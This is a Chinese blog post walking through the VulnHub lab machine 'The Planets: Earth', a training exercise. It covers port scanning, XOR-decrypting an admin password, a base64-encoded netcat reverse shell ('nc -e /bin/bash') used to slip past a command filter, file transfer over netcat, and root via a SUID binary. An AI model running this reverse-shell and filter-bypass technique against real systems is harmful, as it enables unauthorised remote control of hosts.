The Planets: Earth靶机渗透记录

最新推荐文章于 2024-11-01 10:26:53 发布
最新推荐文章于 2024-11-01 10:26:53 发布
阅读量482 收藏 8
点赞数 10
文章标签: php 网络安全 ctf python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/althumi/article/details/135047300
版权 
主机:192.168.101.5
靶机:192.168.101.15

nmap -p- 192.168.101.15

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

#查询发现需要域名DNS:earth.local, DNS:terratest.earth.local 才能正常访问
nmap -sS -sV -A -n 192.168.101.15

Not shown: 970 filtered tcp ports (no-response), 27 filtered tcp ports (admin-prohibited)                                                                                                                          
PORT    STATE SERVICE  VERSION                                                                                                                                                                                     
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)                                                                                                                                                                  
| ssh-hostkey:                                                                                                                                                                                                     
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)                                                                                                                                                    
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)                                                                                                                                                  
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)                                                                                                                     
|_http-title: Bad Request (400)                                                                                                                                                                                    
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9                                                                                                                              
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)                                                                                                                     
|_ssl-date: TLS randomness does not represent time                                                                                                                                                                 
|_http-title: Test Page for the HTTP Server on Fedora                                                                                                                                                              
| http-methods:                                                                                                                                                                                                    
|_  Potentially risky methods: TRACE                                                                                                                                                                               
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space                                                                                                                                              
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local                                                                                                                                             
| Not valid before: 2021-10-12T23:26:31                                                                                                                                                                            
|_Not valid after:  2031-10-10T23:26:31                                                                                                                                                                            
| tls-alpn:                                                                                                                                                                                                        
|_  http/1.1                                                                                                                                                                                                       
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9

#更改hosts文件,解析IP为域名,访问成功
/etc/hosts
192.168.101.15 earth.local
192.168.101.15 terratest.earth.local

#dirsearch扫描后台目录,因为存在两个域名和两个端口,所以都扫一下
dirsearch -u http://earth.local
dirsearch -u http://terratest.earth.local
dirsearch -u https://earth.local
dirsearch -u https://terratest.earth.local
#扫描出的有效信息
http://earth.local/admin
http://earth.local/admin/login
https://terratest.earth.local/robots.txt
#robots.txt下有路径前缀,和一段后缀,写个脚本都试一下,只有后缀txt可以访问
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

https://terratest.earth.local/testingnotes.txt
#获取信息,提示主页消息是用异或加密,testdata.txt是密钥,网站用户是terra
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
#访问密钥内容
https://terratest.earth.local/testdata.txt

key:According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

密文:2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
#解密明文,循环的字符串可能是terra的密码
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
#尝试登录,成功,获取shell
user:terra password:earthclimatechangebad4humans
#因为shell过滤了远程控制的命令,且网站目录没有write权限,所以采用base64加密管道执行
echo "nc -e /bin/bash 192.168.101.5 6666" | base64
#payload为下
echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjUgNjY2Ngo= | base64 -d | bash
#主机开启监听,获得回弹shell
nc -lvvp 6666
#切换交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
#查询flag文件
find / -name "*flag*"

/root/root_flag.txt
/var/earth_web/user_flag.txt
/usr/sbin/grub2-set-bootflag
#获取第一个flag
cat /var/earth_web/user_flag.txt                                                                                                                                                                                   
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]          
#开始提权,查询4000权限文件,发现reset_root文件,意为重置root密码
find / -user root -perm -4000 -print 2>/dev/null 

/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
#执行未成功,nc开启1234端口,传递文件到主机上分析
nc -nlvp 1234 > reset_root

nc 192.168.101.5 1234 < /usr/bin/reset_root
#strace分析结果为缺少3个文件
strace ./reset_root

ccess("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (没有那个文件或目录)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (没有那个文件或目录)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (没有那个文件或目录)
#靶机创建三个文件
touch /dev/shm/kHgTFI5G;touch /dev/shm/Zw7bV9U5;touch /tmp/kcM0Wewe
#执行,提权成功
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth

su
#查看最后的flag,通关
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
althumi
关注
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3153
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
靶机渗透练习The PlanetsEarth
Have_a_great_day的博客
12-17 2056
该命令的目的是快速扫描目标网络中的主机,通过向主机发送 ping 消息来确认其可达性而不进行端口扫描。命令的含义是在系统的根目录下递归地查找具有 Setuid 权限的普通文件,并将结果打印出来。该命令的含义是以当前用户的身份,查询其在系统上被授予的 sudo 特权,并显示与该用户相关的 sudo 配置和权限信息。Crontab 是一种用于定时执行任务的工具,允许用户根据指定的时间和频率来自动执行脚本或命令。是使用 nmap 工具执行的命令,它用于进行主机发现,并对目标网络中的主机进行快速扫描。
渗透测试学习之靶机THE PLANETS: EARTH
xdbzdgx的博客
05-05 1817
前期准备 1.下载靶机The Planets: Earth ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.131 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- -A 192.168.88.131 发现开放了22,80,443端口,且443端口需要设置DNS解析。 没设置DNS解析时,我们尝试访问下,可以看到,状态是400
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1723
靶机名称Earth
靶机渗透练习84-The PlanetsEarth
hirak0的博客
04-27 2527
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 1034
靶机渗透练习-The PlanetsEarth
Vulnhub:The Planets: Earth
weixin_69670995的博客
06-04 937
使用另一个域名在浏览器中访问,发现页面一样,dirb扫描出来的目录也一样,使用https访问另一域名,发现不一样的页面。提示密码使用异或算法,异或字符串放在testdata.txt,用户名是terra,访问testdata.txt。发现程序的作用是更改root密码,但是需要满足一些条件,使用strace进行调试。发现testingnotes文件,不知道后缀,尝试txt的时候访问成功。这里发现三个字符串,先不用管,使用dirb进行目录扫描。发现22,80,443使用浏览器访问80端口。
【Vulnhub】之THE PLANETS: EARTH
zg_111的博客
03-31 1412
XOR(异或)运算strace诊断调试工具nc传输文件。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1108
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
the planets: earth靶机
04-11
问题:关于行星:地球和静机。...回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。
United Planets: The Last Crusade:二维多方向射击游戏-开源
04-29
“联合星球:最后的十字军东征”是由意大利团队Unreal Project开发的第一款免费开源视频游戏。 《最后的十字军东征》是一款2D多向射击游戏,为这些旧式视频游戏的玩家带来了新的体验。 该团队现在发布游戏的首批版本...
Three-Planets:WebGL 项目
06-21
"Three-Planets: WebGL 项目"是一个基于WebGL技术的互动网页应用,由威廉和一个名为第三组的团队共同开发。WebGL是一种在浏览器中实现的JavaScript API,用于渲染交互式的3D图形,无需任何插件。这个项目可能是为了...
planets:Love2D 行星轨道模拟
06-13
本项目"planets: Love2D 行星轨道模拟"正是利用Love2D引擎,实现了对行星运动的模拟,旨在让玩家或开发者深入理解天体运动的规律,并体验到编程带来的乐趣。 首先,让我们详细了解一下Love2D。Love2D是一个跨平台的...
vulnhub吧唧——THE PLANETS: MERCURY
xstlikeja的博客
07-15 205
这里我们sudo -l列出所有可以执行的命令和权限时,发现sudo允许用户以root权限来执行一个shell脚本,并为当前用户配置了SETENV,简直就是瞌睡来了遇到枕头了,这个shell脚本的意思就是利用tail(显示文本末尾行的内容)命令显示/var/log/syslog(系统日志文件)最后十行的内容,作为一个weber,我敏锐的嗅觉告诉我,这个shell脚本一定有问题,果不其然,沉淀之后的我就是不一样,一眼就看出(经过高人指点)这个tail不是绝对路径,所以我们可以在这里做下文章。
PHP文件包含漏洞
佛系摆烂
10-29 574
PHP 文件包含漏洞(File Inclusion Vulnerability)是一种常见的 Web 安全漏洞,发生在用户对 PHP 文件包含函数(如 include、require、include_once、require_once)的输入缺乏过滤和验证时。攻击者可以利用这个漏洞来包含服务器上任意文件,甚至是远程文件(如果服务器允许),从而获取敏感信息或执行任意代码。
文件上传漏洞-通过.htaccess文件绕过
m0_73902453的博客
10-30 312
3.先将.htaccess上传上去,然后再打开抓包上传木马文件(1.php),然后将名字修改成1.jpg,因为刚刚的.htaccess已经上传到服务器,告诉服务器.jpg文件可以当作.php文件执行。通过这个文件,网站管理员可以进行各种配置,例如重定向、访问控制、URL重写等。结尾的文件都当作 PHP 脚本来处理,而不是作为普通文本文件或图像文件。这意味着,即使它们有文本或影像文件的扩展名,服务器将尝试执行其中的 PHP代码。2.这里以upload-labs(less-4)为例,我们先来看看靶场的源代码。
黑客扫描全网 Git 配置文件并窃取大量云凭据
最新发布
分享web安全、AI安全、云安全、业务安全、渗透测试、安全开发、安全工具、行业动态等优质内容……
11-01 1287
Sysdig 表示,在 Telegram 上,仅指向公开的 Git 配置文件的 URL 列表就以 100 美元左右的价格出售,那些实际去利用的人可能会赚取到更多的钱。攻击者使用暴露的电子邮件平台身份验证令牌来开展垃圾邮件和网络钓鱼活动。在公开的 URL 中,有 28,000 个对应于 Git 存储库,6,000 个是 GitHub 令牌,值得注意的是,有 2,000 个被验证为有效凭证。Sysdig 表示,黑客甚至创建了文件,列出了所有可能的 IPv4 地址,包含超过 42 亿个目标,以方便未来的扫描。
Unsafe Fileupload-pikachu
zhangqqa的博客
10-30 991
不安全的文件上传漏洞概述文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。
warmup
W286734的博客
10-30 382
查看源代码发现,source.php。访问source.php,显而易见,php代码审计。$pos。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值